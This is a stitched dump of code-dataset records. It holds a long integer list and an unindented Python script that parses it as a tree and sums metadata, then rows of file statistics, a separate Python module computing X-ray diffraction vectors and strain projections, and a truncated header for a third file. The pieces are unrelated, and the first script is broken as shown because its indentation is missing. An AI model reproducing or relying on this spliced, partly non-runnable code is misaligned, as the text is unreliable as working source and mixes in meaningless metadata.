6 2 2 3 1 1 1 8 0 9 5 3 3 1 6 4 5 5 3 1 2 2 2 2 1 3 1 4 2 4 2 2 3 5 1 9 0 7 1 8 7 1 4 2 7 3 1 2 1 2 1 2 3 2 1 7 0 8 1 3 2 8 9 4 7 3 1 3 1 1 1 2 1 1 7 0 6 2 7 8 1 9 5 3 2 1 2 2 1 3 1 4 1 2 1 3 6 1 6 0 11 1 1 1 3 6 4 8 6 5 1 5 2 1 3 1 2 2 1 8 0 8 8 2 8 3 9 4 1 5 1 1 2 2 1 1 3 3 1 8 0 7 1 3 5 1 4 1 2 3 3 2 1 2 1 1 3 3 5 4 3 1 3 3 6 1 5 0 9 2 7 8 7 2 4 1 8 1 1 3 3 2 3 1 6 0 7 5 7 2 7 2 4 1 3 2 2 3 1 1 1 8 0 7 4 8 5 1 3 2 6 3 1 2 2 3 2 3 1 1 4 3 4 5 3 7 1 6 4 4 3 5 1 7 0 6 4 4 6 1 7 1 1 2 1 1 1 3 3 1 6 0 10 1 2 8 7 5 8 7 5 4 7 3 1 3 2 1 2 1 8 0 10 6 8 1 1 1 1 2 6 5 9 2 3 2 1 1 1 2 2 5 3 1 3 3 3 5 1 8 0 10 8 2 9 7 3 1 7 4 7 1 2 3 2 2 2 2 1 2 1 5 0 11 3 6 1 8 4 3 7 1 9 4 8 1 2 3 3 3 1 7 0 11 2 4 6 3 2 6 6 3 1 7 7 3 3 1 2 1 1 3 3 3 2 3 2 3 5 1 8 0 10 7 9 5 5 8 2 9 4 1 8 1 2 3 3 1 2 2 2 1 9 0 9 8 4 8 6 1 2 6 6 6 1 1 2 1 3 1 3 1 3 1 9 0 10 6 1 7 1 9 5 5 4 3 3 2 1 1 1 1 2 1 2 2 2 5 4 3 5 3 6 1 8 0 10 3 1 1 9 7 8 8 7 1 3 2 3 3 3 1 3 1 3 1 9 0 7 9 9 6 1 8 5 8 3 3 1 1 2 1 1 3 1 1 5 0 8 1 1 7 1 1 7 3 9 1 1 3 2 1 3 2 5 4 4 3 6 4 2 1 5 3 3 4 1 7 0 8 4 3 1 5 9 1 5 2 2 2 1 3 3 1 3 1 5 0 7 1 9 6 5 1 7 6 3 1 3 2 1 1 5 0 6 5 5 9 8 6 1 2 3 1 1 3 2 3 2 5 3 6 1 6 0 9 9 2 9 9 5 7 1 1 7 2 2 2 3 2 1 1 5 0 6 5 9 3 1 6 7 2 1 2 2 1 1 8 0 7 1 3 9 1 5 9 4 1 2 2 1 3 2 2 3 3 4 1 3 1 3 3 5 1 8 0 11 2 1 9 1 7 3 1 2 9 1 1 2 2 3 1 1 1 2 2 1 8 0 11 9 1 6 5 1 6 8 3 1 3 8 3 2 1 3 1 2 3 3 1 9 0 10 8 1 1 4 1 6 9 8 9 5 2 3 1 2 2 2 3 1 1 5 5 4 1 3 3 5 1 9 0 6 6 1 3 9 6 4 3 1 2 2 3 1 2 2 3 1 9 0 6 6 1 8 8 5 5 2 1 3 3 2 1 3 3 1 1 6 0 9 5 9 8 9 6 1 7 8 1 1 1 2 2 1 1 1 3 4 4 4 3 4 1 8 0 7 8 4 9 2 2 1 7 1 2 1 1 1 2 1 2 1 6 0 10 6 7 8 1 5 3 5 1 1 9 1 1 3 1 3 3 1 9 0 8 3 1 4 7 7 8 8 3 3 3 1 3 3 1 2 1 1 1 5 3 3 3 6 4 4 4 3 6 1 9 0 8 8 6 4 2 2 1 6 6 3 1 2 2 2 1 1 1 2 1 8 0 10 5 3 7 5 1 2 4 9 4 3 1 2 3 1 2 1 1 1 1 9 0 8 7 5 1 6 1 1 1 6 1 3 2 1 3 2 3 2 2 5 4 3 4 3 4 3 6 1 9 0 7 4 5 8 1 1 6 6 3 1 2 1 2 3 3 2 1 1 7 0 11 1 4 4 8 1 7 2 1 7 2 9 1 2 1 1 2 1 2 1 8 0 10 2 4 8 6 3 7 1 1 4 5 1 3 2 3 2 1 1 1 5 1 2 1 2 1 3 5 1 5 0 11 4 1 1 2 4 3 1 9 8 4 4 1 1 1 3 2 1 6 0 7 1 7 7 8 2 8 7 1 2 2 2 1 2 1 9 0 10 4 7 5 9 4 1 9 4 2 7 3 1 2 3 2 2 3 3 1 3 5 1 1 3 3 4 1 6 0 6 1 2 7 4 6 3 3 1 2 1 1 2 1 9 0 8 4 5 5 9 5 1 7 8 1 3 1 1 2 1 1 1 3 1 7 0 8 1 4 8 3 6 5 2 1 3 3 3 1 1 1 3 3 1 3 5 2 2 3 2 5 3 3 5 1 5 0 7 3 4 1 4 1 4 3 1 3 3 1 1 1 7 0 7 8 1 5 7 1 5 4 1 1 2 3 1 2 3 1 9 0 6 3 5 1 1 1 3 1 1 1 3 1 1 1 2 2 2 5 1 4 5 3 5 1 8 0 10 6 4 5 9 3 9 8 1 3 7 3 1 3 1 2 2 3 1 1 9 0 10 1 3 9 2 2 8 9 6 4 3 1 3 1 3 2 1 2 1 2 1 9 0 9 1 2 5 7 8 7 9 6 1 3 2 2 1 2 2 3 3 1 3 3 1 1 4 3 6 1 8 0 9 1 8 2 5 5 6 2 4 1 1 3 2 2 1 1 1 1 1 7 0 6 7 1 5 4 5 9 1 3 3 2 1 1 1 1 8 0 9 4 7 6 6 4 2 2 5 1 3 1 2 2 1 3 2 2 5 2 3 5 2 1 3 4 1 9 0 8 1 5 1 7 1 8 9 1 2 3 2 3 2 1 1 1 3 1 7 0 11 7 9 1 8 5 5 1 2 2 5 6 1 1 1 1 1 1 2 1 5 0 8 2 6 8 1 8 7 5 3 2 1 1 2 1 2 3 5 2 3 5 1 9 0 6 1 5 9 2 5 1 1 2 1 2 3 2 2 1 3 1 8 0 11 3 5 4 6 7 4 9 4 8 1 5 1 3 3 3 1 1 2 2 1 9 0 7 9 6 1 9 8 1 9 3 3 2 1 1 1 2 3 2 2 5 3 1 5 2 4 7 5 3 3 5 1 6 0 8 8 6 6 1 4 2 1 7 3 2 2 2 1 1 1 6 0 8 6 1 6 8 3 5 8 6 3 1 1 3 2 1 1 8 0 11 9 4 9 2 5 1 9 7 1 8 2 3 2 1 2 3 3 2 1 4 3 1 5 3 3 7 1 7 0 11 4 9 3 2 5 5 6 5 1 4 1 2 3 3 2 1 3 1 1 9 0 9 1 8 7 3 3 6 1 3 2 3 3 3 3 2 1 3 3 3 1 9 0 6 4 1 7 9 7 1 2 3 1 3 3 1 3 1 3 1 4 1 3 4 2 2 3 5 1 5 0 11 3 1 7 1 4 9 8 6 7 5 2 2 1 3 3 2 1 5 0 9 1 5 1 5 8 1 1 5 7 2 1 3 3 1 1 6 0 7 2 3 1 6 8 6 9 1 3 2 3 3 2 2 2 1 3 4 3 7 1 9 0 11 9 9 2 2 4 5 1 6 1 5 9 3 3 1 2 1 1 1 3 2 1 5 0 10 7 1 7 3 1 1 6 1 9 2 3 1 1 2 2 1 6 0 11 6 1 1 1 5 5 5 3 9 6 5 2 2 1 1 1 3 3 3 3 4 1 1 4 3 5 1 9 0 10 8 7 3 9 3 1 7 9 3 4 1 1 3 2 2 3 3 1 3 1 5 0 7 4 1 2 3 9 7 4 1 1 1 2 2 1 6 0 6 9 8 1 1 8 2 3 1 3 2 1 1 3 5 1 4 3 4 5 4 4 3 3 6 1 6 0 10 7 3 4 6 7 6 3 5 6 1 3 2 1 1 2 1 1 8 0 8 2 8 4 1 1 4 9 2 1 2 3 1 1 2 1 1 1 6 0 10 1 9 6 8 8 8 7 5 7 1 1 1 2 2 1 1 5 5 2 4 2 3 3 5 1 9 0 10 6 8 6 9 1 2 9 7 9 5 3 2 1 3 3 1 1 2 1 1 8 0 9 3 7 1 1 7 6 8 5 7 3 2 1 3 3 1 1 1 1 8 0 10 4 2 6 8 3 2 6 9 1 6 2 2 1 1 1 1 2 2 1 1 5 1 5 3 4 1 7 0 11 9 2 1 9 6 6 3 4 7 1 1 2 1 2 1 3 2 3 1 5 0 6 6 9 5 1 9 9 1 2 2 3 1 1 5 0 8 1 8 8 1 3 8 8 5 1 1 3 1 1 2 5 1 1 3 4 1 9 0 9 4 1 1 2 7 5 9 7 3 1 2 1 3 3 3 3 1 2 1 8 0 9 4 6 8 9 4 1 9 6 1 2 3 1 1 2 3 2 2 1 5 0 6 9 1 5 1 9 7 3 2 3 1 1 5 3 5 1 5 3 2 3 8 6 2 5 5 3 7 1 7 0 7 5 2 7 3 1 4 8 3 1 1 2 1 3 2 1 7 0 8 6 2 7 2 7 1 9 1 1 3 2 3 2 2 1 1 5 0 9 7 3 8 1 6 1 3 4 2 1 3 3 3 1 1 3 1 1 2 3 3 3 6 1 8 0 8 1 5 4 7 7 5 4 9 1 2 2 2 1 2 2 3 1 7 0 8 8 3 7 6 6 4 6 1 3 2 1 1 3 1 1 1 8 0 9 7 5 1 1 8 2 5 8 6 2 1 1 1 1 1 1 2 3 5 3 1 5 3 3 4 1 9 0 10 8 6 6 3 8 1 6 3 7 2 1 3 1 1 1 2 2 3 1 1 8 0 8 4 3 5 6 5 1 3 6 2 2 2 3 3 1 1 3 1 5 0 8 1 1 4 9 2 7 4 1 3 1 2 1 1 3 2 2 5 3 7 1 5 0 9 1 4 8 9 5 4 5 9 1 2 1 1 1 3 1 9 0 11 4 4 5 2 1 3 3 3 5 2 2 2 2 1 2 2 3 2 1 1 1 5 0 10 7 6 8 7 6 1 1 2 3 8 1 2 2 2 2 1 5 2 5 2 4 2 3 4 1 7 0 6 4 7 6 7 1 4 2 1 1 1 2 1 2 1 7 0 7 9 1 3 8 4 2 7 3 2 1 3 3 1 3 1 6 0 7 5 5 2 4 1 7 2 1 2 3 1 1 1 5 1 4 1 3 2 3 3 6 5 5 3 4 1 6 0 8 9 4 7 8 1 2 6 2 1 1 1 2 3 2 1 8 0 8 9 1 7 9 6 2 6 5 3 2 2 2 2 1 1 1 1 8 0 11 8 1 6 3 4 7 4 8 7 3 6 3 2 3 2 2 2 1 2 4 1 3 5 3 7 1 9 0 10 3 7 9 7 9 9 3 4 3 1 1 3 1 2 3 3 3 3 1 1 8 0 10 8 7 7 1 5 7 2 7 9 4 3 1 3 1 3 1 3 1 1 5 0 9 4 4 8 9 1 2 1 8 1 2 3 3 3 1 2 3 5 2 1 4 1 3 6 1 6 0 7 8 6 8 6 9 1 8 2 3 2 1 1 1 1 7 0 9 5 2 6 8 1 6 8 5 6 2 3 3 1 1 2 1 1 5 0 6 6 1 1 5 3 1 1 1 1 2 1 4 2 2 2 3 4 3 5 1 5 0 10 9 3 7 7 9 1 6 3 1 4 1 2 1 3 2 1 7 0 10 1 4 9 6 4 5 5 5 1 5 2 2 1 2 3 2 3 1 8 0 10 4 2 1 7 9 6 9 7 1 1 2 1 1 3 2 2 1 1 3 2 5 4 3 3 5 1 9 0 8 1 8 7 1 7 1 1 2 1 1 2 1 1 2 3 3 2 1 6 0 9 5 2 5 4 7 6 4 6 1 2 3 1 1 3 2 1 5 0 10 4 1 2 5 1 6 7 3 4 1 1 3 3 1 1 3 1 3 5 5 7 1 6 5 5 5 5 3 6 1 7 0 6 9 2 4 3 1 1 2 2 2 1 3 2 1 1 9 0 8 6 7 2 7 1 7 4 3 1 3 2 3 3 1 2 1 3 1 7 0 8 4 3 8 1 9 2 6 7 1 2 2 1 1 3 1 4 1 1 3 4 2 3 4 1 9 0 11 9 9 5 3 1 3 5 4 3 3 6 2 3 2 1 1 2 1 3 1 1 5 0 9 4 8 4 7 1 4 4 8 2 1 3 1 1 3 1 9 0 11 4 3 8 1 2 9 7 7 1 8 8 2 1 2 1 2 3 2 3 2 1 3 2 2 3 7 1 7 0 9 7 7 5 5 1 9 8 1 4 1 1 1 1 2 3 2 1 6 0 7 6 4 7 7 6 1 1 1 1 1 1 1 1 1 9 0 6 3 1 6 2 4 6 1 3 1 2 3 1 1 3 1 4 3 2 2 3 4 3 3 4 1 7 0 10 5 9 8 6 1 2 1 8 1 3 1 2 2 1 2 2 2 1 6 0 10 7 3 8 8 5 9 7 2 1 2 3 3 1 1 1 2 1 7 0 8 2 5 4 7 1 9 9 1 2 1 2 3 3 2 2 1 2 3 5 3 7 1 5 0 11 2 1 1 5 3 9 7 9 6 8 1 1 3 1 1 2 1 9 0 9 1 6 1 7 8 2 8 6 3 3 2 2 2 1 3 2 1 1 1 9 0 8 1 4 3 8 4 6 9 4 3 2 3 1 3 2 1 2 3 1 5 3 1 4 3 5 2 1 4 4 1 4 3 3 6 1 7 0 7 9 2 6 2 4 1 4 1 1 3 3 3 1 1 1 8 0 11 1 4 7 4 1 9 2 4 3 2 7 2 2 3 2 1 3 3 2 1 8 0 8 1 3 5 4 6 4 9 2 1 3 2 3 2 1 1 1 2 1 4 3 5 4 3 5 1 9 0 10 5 7 3 1 4 3 8 5 5 3 1 1 3 1 1 2 3 1 3 1 9 0 10 3 1 1 3 7 1 3 7 7 8 1 2 2 1 2 1 2 3 3 1 5 0 9 5 3 1 1 7 2 4 5 4 3 2 2 1 3 3 1 4 2 5 3 6 1 6 0 9 4 5 3 4 3 7 1 1 2 3 2 1 1 2 1 1 7 0 10 6 3 1 2 1 1 8 8 1 3 1 2 3 1 1 3 2 1 9 0 7 8 4 1 8 2 6 4 2 1 1 3 3 2 1 3 3 1 1 3 3 5 3 3 4 1 8 0 8 2 5 2 7 5 1 6 3 1 1 2 1 3 2 3 3 1 5 0 7 7 1 6 5 4 1 1 1 1 3 2 3 1 6 0 6 1 3 4 9 2 3 3 1 1 1 1 2 3 3 3 5 2 3 3 5 5 3 4 1 5 0 11 4 9 9 1 9 8 9 2 3 6 9 1 2 3 1 1 1 6 0 9 4 6 5 9 5 3 9 3 1 2 1 2 1 1 3 1 8 0 9 9 1 8 1 6 2 1 1 3 1 1 3 3 3 3 3 1 4 1 5 4 3 4 1 9 0 9 7 1 1 7 2 7 1 9 9 1 1 1 1 1 2 1 1 1 1 7 0 10 5 7 1 8 7 6 3 4 6 6 2 3 2 1 3 1 3 1 9 0 6 1 4 1 3 7 7 3 2 2 2 2 2 1 1 1 3 3 1 5 3 6 1 5 0 10 6 9 8 1 6 6 1 1 7 5 3 3 3 3 1 1 5 0 10 7 1 1 6 1 4 7 2 2 9 3 2 1 3 3 1 5 0 7 8 5 5 3 1 7 7 2 1 1 2 2 3 4 2 3 1 2 3 6 1 9 0 8 8 4 3 6 1 4 4 2 1 1 1 1 1 2 1 3 2 1 6 0 9 3 2 9 6 5 1 6 3 6 3 1 3 2 1 1 1 6 0 11 3 1 6 9 4 7 3 8 1 9 3 1 1 1 1 3 2 3 1 5 3 5 1 3 7 1 9 0 11 4 1 8 6 7 7 5 2 4 1 9 1 2 3 1 2 1 3 2 3 1 6 0 10 2 3 9 7 5 6 1 1 4 2 1 1 3 2 3 2 1 8 0 6 6 6 8 7 1 2 2 2 1 1 1 3 3 1 1 4 5 1 5 4 1 4 1 3 2 5 4 4 3 6 1 5 0 9 2 6 2 6 9 6 4 2 1 2 1 3 1 1 1 6 0 11 8 6 5 7 1 6 8 2 9 5 6 1 1 2 2 1 1 1 9 0 11 7 5 1 2 2 1 8 3 6 3 4 1 2 2 2 2 1 1 2 1 2 4 2 1 2 4 3 5 1 8 0 7 2 1 5 2 5 1 8 3 2 1 3 1 1 3 2 1 8 0 9 3 3 1 4 3 8 9 2 4 1 2 3 3 3 3 1 1 1 7 0 7 1 6 6 5 1 8 5 1 2 2 1 2 3 1 3 1 1 2 5 3 7 1 6 0 7 7 1 9 1 5 8 6 1 2 3 2 1 2 1 7 0 7 4 1 8 3 4 1 4 2 1 1 1 2 3 3 1 7 0 7 1 6 4 8 1 8 6 2 3 1 1 3 2 1 2 3 2 2 5 5 1 3 7 1 9 0 10 1 1 8 1 9 5 3 1 9 7 3 2 2 2 2 3 1 3 1 1 7 0 10 1 2 3 2 2 8 1 7 4 8 2 1 3 1 3 1 2 1 9 0 10 6 1 3 8 8 1 8 1 1 2 2 1 2 3 3 1 1 1 1 2 5 5 3 2 1 4 1 2 3 3 8 6 6 3 5 5 3 7 1 8 0 11 9 1 4 5 7 1 9 1 2 9 3 1 1 2 2 2 1 3 3 1 7 0 10 1 3 1 3 1 3 4 7 6 8 3 2 2 1 3 2 1 1 5 0 9 6 9 6 7 2 9 1 3 2 3 2 1 1 1 1 1 5 3 2 2 2 3 7 1 9 0 7 9 4 1 4 2 9 1 1 1 3 3 3 1 3 1 1 1 6 0 9 7 1 7 7 7 7 1 7 5 1 3 1 3 3 1 1 6 0 8 1 6 9 4 1 7 5 7 3 3 1 1 2 1 1 4 5 5 1 1 2 3 7 1 7 0 8 1 8 2 3 6 1 5 8 3 1 1 1 1 3 3 1 8 0 10 6 2 4 9 6 9 1 3 1 1 2 1 1 1 3 1 3 3 1 8 0 11 2 4 7 5 1 1 8 8 1 9 2 1 2 1 3 1 3 3 3 2 1 2 2 1 1 4 3 5 1 8 0 11 8 7 4 7 3 4 1 1 4 1 1 2 3 2 2 1 2 1 2 1 8 0 8 1 1 8 5 3 9 9 5 2 1 1 2 1 2 1 1 1 8 0 6 7 2 9 1 6 3 2 1 2 2 1 1 3 2 3 3 5 2 4 3 5 1 5 0 6 1 2 3 7 1 2 1 2 1 3 3 1 6 0 7 9 1 9 6 7 8 8 1 2 1 1 1 3 1 9 0 10 1 9 7 3 7 8 1 1 4 1 1 1 2 1 2 1 1 1 3 3 5 3 4 1 1 4 6 5 2 5 4 3 5 1 6 0 8 9 4 1 7 6 9 2 7 2 2 2 2 1 3 1 9 0 8 1 8 2 6 5 1 1 9 1 1 3 1 2 2 2 1 1 1 5 0 7 2 8 5 4 1 7 5 2 3 1 3 1 3 3 1 3 3 3 7 1 9 0 11 7 8 4 8 4 9 6 6 1 7 8 2 1 2 2 1 3 1 1 1 1 7 0 7 3 9 6 2 5 1 3 2 2 1 3 2 1 1 1 7 0 6 7 1 3 6 6 9 2 2 1 1 1 3 3 3 3 2 5 1 4 2 3 7 1 8 0 10 6 4 4 7 2 1 2 1 3 8 1 2 1 3 3 2 2 1 1 8 0 7 3 4 3 9 5 1 1 3 2 3 2 1 3 3 2 1 9 0 6 9 9 1 5 1 3 2 1 2 1 1 1 1 2 3 2 2 2 2 2 5 1 3 5 1 8 0 8 9 4 2 1 2 9 9 5 1 3 3 2 1 1 2 3 1 7 0 6 1 3 4 1 7 7 1 1 2 2 1 3 3 1 8 0 11 4 9 3 9 2 1 5 1 1 6 3 2 1 1 2 2 2 3 2 1 3 4 1 2 3 6 1 9 0 10 4 4 7 4 8 7 1 9 8 4 1 1 1 3 2 3 1 2 1 1 9 0 6 6 1 3 7 3 5 2 3 3 3 1 1 2 1 3 1 6 0 8 4 2 2 1 4 3 7 6 1 1 2 1 2 3 1 2 5 2 2 3 6 1 4 2 5 4 3 4 1 5 0 10 4 1 2 9 3 5 3 4 6 5 3 2 1 1 1 1 8 0 8 5 7 1 2 5 4 3 1 3 2 3 3 1 1 1 1 1 8 0 7 1 4 9 9 8 1 2 3 3 2 1 2 3 1 3 1 4 2 5 3 4 1 6 0 11 6 5 9 7 6 8 4 4 5 2 1 2 1 3 2 1 1 1 7 0 10 3 9 1 9 1 4 1 7 9 7 1 1 3 1 1 2 3 1 9 0 11 5 1 6 6 6 1 1 9 4 8 3 2 3 2 3 1 3 1 2 3 5 2 1 2 3 4 1 6 0 11 1 3 3 4 1 9 4 8 2 5 5 1 2 3 3 2 2 1 5 0 7 6 9 8 9 8 6 1 1 1 3 2 1 1 8 0 7 1 1 2 8 7 7 7 3 1 3 1 1 1 2 3 4 1 3 2 3 4 1 9 0 8 2 4 8 2 9 1 1 4 2 2 3 1 3 3 1 3 3 1 7 0 9 3 2 8 6 6 1 8 5 5 1 3 2 1 2 1 1 1 5 0 6 3 8 8 1 7 5 3 3 1 3 1 3 5 4 3 3 5 1 9 0 7 7 1 7 5 2 1 1 2 3 3 2 1 3 3 1 1 1 9 0 9 1 3 1 3 9 3 4 5 9 3 2 3 2 1 1 3 1 1 1 7 0 8 3 7 1 6 1 5 3 4 3 3 2 1 1 2 1 2 2 2 2 5 2 5 7 5 5 3 3 5 1 7 0 8 9 1 4 7 8 6 5 9 3 3 3 1 1 3 1 1 9 0 8 3 2 6 1 2 7 1 8 1 2 1 2 2 1 3 3 3 1 9 0 6 9 3 7 1 1 6 1 3 2 2 2 3 1 2 3 2 4 2 3 3 3 4 1 9 0 10 2 1 4 2 9 1 3 2 6 7 3 2 1 1 2 1 3 2 3 1 6 0 6 2 4 6 4 9 1 1 3 2 1 1 1 1 9 0 7 7 1 1 8 5 9 1 1 3 3 1 1 1 3 2 1 3 4 2 2 3 6 1 6 0 10 3 8 9 6 2 1 6 2 5 1 2 1 3 3 1 1 1 8 0 7 4 3 9 1 1 1 2 3 3 2 2 1 2 2 2 1 7 0 11 5 7 3 2 2 9 5 1 3 7 1 3 2 1 1 1 2 3 5 5 5 3 4 1 3 6 1 9 0 10 9 9 1 1 1 1 1 2 1 6 2 1 2 1 1 1 2 2 3 1 9 0 9 7 3 7 1 9 4 1 4 7 1 1 2 3 3 2 1 2 1 1 6 0 10 2 1 2 7 8 6 6 2 5 3 3 1 1 1 3 1 4 3 4 2 3 5 3 4 1 7 0 6 3 2 7 1 9 1 3 3 3 1 2 1 2 1 7 0 8 9 5 9 6 8 1 2 3 1 1 2 1 3 1 1 1 9 0 6 2 6 1 5 1 4 1 3 3 3 3 2 1 2 3 2 1 4 4 3 5 5 4 3 3 7 1 8 0 11 8 7 5 1 1 8 1 8 7 3 9 2 2 2 1 1 2 1 3 1 5 0 11 1 8 5 1 9 7 3 4 9 4 1 3 3 1 3 2 1 5 0 9 9 5 1 6 3 7 3 1 4 1 1 2 2 1 1 2 4 5 2 4 4 3 4 1 8 0 9 6 7 8 1 4 3 7 4 5 1 1 1 1 3 3 2 1 1 5 0 11 4 8 1 1 1 2 4 4 1 5 1 2 1 1 1 1 1 9 0 9 5 3 4 5 4 1 2 5 8 3 2 2 1 1 2 2 1 2 3 2 3 2 3 7 1 7 0 11 6 7 1 9 9 8 3 4 7 9 8 1 2 3 1 2 1 1 1 5 0 7 9 1 8 5 1 1 8 1 3 1 2 1 1 9 0 11 3 9 1 4 3 8 2 1 4 9 5 2 1 1 3 2 3 3 3 1 3 5 3 5 2 4 2 3 5 1 6 0 9 1 2 8 3 3 1 5 9 8 2 1 3 2 2 1 1 6 0 11 7 5 2 7 1 2 4 4 1 1 4 2 2 2 2 1 1 1 6 0 8 3 2 4 1 8 6 4 6 1 1 2 2 1 3 2 4 3 4 5 5 6 3 4 3 3 4 1 5 0 10 2 3 8 5 6 1 1 5 2 8 2 2 1 2 1 1 9 0 11 9 1 7 4 9 8 1 8 4 3 1 2 3 2 2 3 2 1 1 3 1 7 0 7 9 5 5 9 1 5 1 1 2 3 3 2 1 1 1 4 5 1 3 7 1 5 0 7 2 6 1 4 1 1 6 2 1 2 3 1 1 6 0 6 1 1 5 2 6 4 2 2 3 1 1 1 1 7 0 9 1 7 1 1 8 4 7 7 8 1 2 2 2 2 1 2 1 2 1 3 1 4 5 3 4 1 8 0 10 1 1 5 6 7 6 6 6 9 5 1 1 1 1 1 2 1 2 1 5 0 6 5 1 4 1 3 9 2 2 1 2 3 1 9 0 10 4 8 6 3 1 8 5 9 5 1 2 2 3 2 1 1 2 1 1 3 1 5 3 3 4 1 6 0 10 6 9 9 1 5 1 8 6 5 5 3 3 2 3 1 1 1 6 0 9 1 1 2 8 8 7 5 1 9 1 3 1 1 2 1 1 5 0 9 1 1 9 7 7 9 5 1 8 3 1 1 3 3 1 1 5 1 3 2 3 3 6 3 8 2 6 7 5 1 6 4 3 9 4"
#numbers = "2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2"
def ids_gen():
x = 1
while True:
yield x
x += 1
ids = ids_gen()
def parse_node(numbers):
numbers = iter(numbers)
c_id = next(ids)
children_n = next(numbers)
children = []
metadata_n = next(numbers)
metadata = []
for x in range(0, children_n):
children.append(parse_node(numbers))
for x in range(0, metadata_n):
metadata.append(next(numbers))
return([c_id, children, metadata])
def total_sum(nodemap):
return(sum(map(lambda c: total_sum(c), nodemap[1]))+sum(nodemap[2]))
def special_sum(nodemap):
if len(nodemap[1]) == 0:
return(sum(nodemap[2]))
else:
total = 0
for r in nodemap[2]:
if r in range(1, len(nodemap[1])+1):
total += special_sum(nodemap[1][r-1])
return(total)
numbers = list(map(int, numbers.split(" ")))
root = parse_node(numbers)
print(total_sum(root))
print(special_sum(root))
| 769.023256 | 32,072 | 0.506532 | 16,063 | 33,068 | 1.041711 | 0.003175 | 0.157174 | 0.076555 | 0.032033 | 0.851192 | 0.693779 | 0.522261 | 0.288651 | 0.101596 | 0.029702 | 0 | 0.958212 | 0.489083 | 33,068 | 42 | 32,073 | 787.333333 | 0.032199 | 0.001421 | 0 | 0 | 0 | 0.029412 | 0.970957 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0.029412 | 0.117647 | 0.058824 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
27157d35ef7dbf12c8c7abc7071b48ae43b32fce | 2,989 | py | Python | easistrain/EDD/EDD_Test_fund_method.py | woutdenolf/easistrain | 0484168e33e548af01a5cc649abf815c45b182f1 | [
"MIT"
] | null | null | null | easistrain/EDD/EDD_Test_fund_method.py | woutdenolf/easistrain | 0484168e33e548af01a5cc649abf815c45b182f1 | [
"MIT"
] | null | null | null | easistrain/EDD/EDD_Test_fund_method.py | woutdenolf/easistrain | 0484168e33e548af01a5cc649abf815c45b182f1 | [
"MIT"
] | 1 | 2021-08-04T14:02:16.000Z | 2021-08-04T14:02:16.000Z | import numpy as np
import scipy.optimize
def diffVector(angles, e11, e22, e33, e23, e13, e12):
phi = np.radians(angles[:, 0])
chi = np.radians(angles[:, 1])
omega = np.radians(angles[:, 2])
theta = np.radians(angles[:, 3])
delta = np.radians(angles[:, 4])
q1 = (
(np.cos(theta) * np.cos(chi) * np.sin(delta) * np.sin(phi))
+ (
np.cos(delta)
* np.cos(theta)
* (
(np.cos(phi) * np.sin(omega))
- (np.cos(omega) * np.sin(phi) * np.sin(chi))
)
)
- np.sin(theta)
* ((np.cos(phi) * np.cos(omega)) + (np.sin(phi) * np.sin(chi) * np.sin(omega)))
)
q2 = (
np.cos(delta)
* np.cos(theta)
* ((np.cos(phi) * np.cos(omega) * np.sin(chi)) + (np.sin(phi) * np.sin(omega)))
- (np.cos(theta) * np.cos(phi) * np.cos(chi) * np.sin(delta))
- (
np.sin(theta)
* (
(np.cos(omega) * np.sin(phi))
- (np.cos(phi) * np.sin(chi) * np.sin(omega))
)
)
)
q3 = (
(np.cos(delta) * np.cos(theta) * np.cos(chi) * np.cos(omega))
+ (np.cos(theta) * np.sin(delta) * np.sin(chi))
+ (np.cos(chi) * np.sin(theta) * np.sin(omega))
)
defDirMeas = (
(e11 * q1 ** 2)
+ (e22 * q2 ** 2)
+ (e33 * q3 ** 2)
+ (2 * e12 * q1 * q2)
+ (2 * e13 * q1 * q3)
+ (2 * e23 * q2 * q3)
)
return q1, q2, q3, defDirMeas
def deforDirMeas(angles, e11, e22, e33, e23, e13, e12):
phi = np.radians(angles[:, 0])
chi = np.radians(angles[:, 1])
omega = np.radians(angles[:, 2])
theta = np.radians(angles[:, 3])
delta = np.radians(angles[:, 4])
q1 = (
(np.cos(theta) * np.cos(chi) * np.sin(delta) * np.sin(phi))
+ (
np.cos(delta)
* np.cos(theta)
* (
(np.cos(phi) * np.sin(omega))
- (np.cos(omega) * np.sin(phi) * np.sin(chi))
)
)
- np.sin(theta)
* ((np.cos(phi) * np.cos(omega)) + (np.sin(phi) * np.sin(chi) * np.sin(omega)))
)
q2 = (
np.cos(delta)
* np.cos(theta)
* ((np.cos(phi) * np.cos(omega) * np.sin(chi)) + (np.sin(phi) * np.sin(omega)))
- (np.cos(theta) * np.cos(phi) * np.cos(chi) * np.sin(delta))
- (
np.sin(theta)
* (
(np.cos(omega) * np.sin(phi))
- (np.cos(phi) * np.sin(chi) * np.sin(omega))
)
)
)
q3 = (
(np.cos(delta) * np.cos(theta) * np.cos(chi) * np.cos(omega))
+ (np.cos(theta) * np.sin(delta) * np.sin(chi))
+ (np.cos(chi) * np.sin(theta) * np.sin(omega))
)
defDirMeas = (
(e11 * q1 ** 2)
+ (e22 * q2 ** 2)
+ (e33 * q3 ** 2)
+ (2 * e12 * q1 * q2)
+ (2 * e13 * q1 * q3)
+ (2 * e23 * q2 * q3)
)
return defDirMeas
| 30.191919 | 87 | 0.424891 | 396 | 2,989 | 3.207071 | 0.085859 | 0.181102 | 0.110236 | 0.113386 | 0.930709 | 0.930709 | 0.930709 | 0.930709 | 0.930709 | 0.930709 | 0 | 0.051377 | 0.368351 | 2,989 | 98 | 88 | 30.5 | 0.621292 | 0 | 0 | 0.765957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0 | 0.021277 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
27adf2119869e9c68d0a3c070336f9f551af44d9 | 12,320 | py | Python | directoalartista/apps/myaccount/forms.py | mpampols/directoalartista.com | 833eea7f4db5a2343dba4314793d593cd66cf1fb | [
"MIT"
] | null | null | null | directoalartista/apps/myaccount/forms.py | mpampols/directoalartista.com | 833eea7f4db5a2343dba4314793d593cd66cf1fb | [
"MIT"
